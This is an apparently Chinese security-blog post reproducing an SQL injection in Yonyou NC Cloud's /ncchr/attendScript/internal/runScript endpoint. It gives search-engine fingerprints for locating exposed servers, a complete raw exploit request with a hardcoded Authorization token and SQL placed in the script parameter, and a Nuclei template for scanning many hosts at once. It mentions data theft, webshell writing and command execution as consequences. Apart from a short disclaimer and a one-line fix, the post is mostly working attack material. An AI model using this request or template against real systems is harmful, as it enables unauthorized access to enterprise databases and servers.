【漏洞复现】用友-NC-Cloud-runScript-sql注入

更多干货POC获取，请关注公众号：如棠安全

Nx01 阅读须知

      如棠安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

Nx02 漏洞描述

      用友-nc-cloud runscript sql注入，黑客可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

Nx03 系统指纹
鹰图：web.body="platform/pub/welcome.do"

fofa：body="platform/pub/welcome.do"

Nx04 产品主页

Nx05 漏洞复现

POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Accept-Encoding: gzip

key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual

Nx06 批量验证脚本

id: yongyou-nc-cloud-runScript-sqli

info:
  name: yongyou-nc-cloud-runScript-sqli
  author: m0be1
  severity: high

http:
  - raw:
      - |
        POST /ncchr/attendScript/internal/runScript HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Accept: */*
        Accept-Language: en
        Authorization: 58e00466213416018d01d15de83b0198
        Accept-Encoding: gzip

        key=1&script=select 1,111*111,USER,4,5,6,7,8,9,10 from dual

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"12321")

Nx06 修复建议

联系厂商升级系统版本

更多干货POC获取，请关注公众号：如棠安全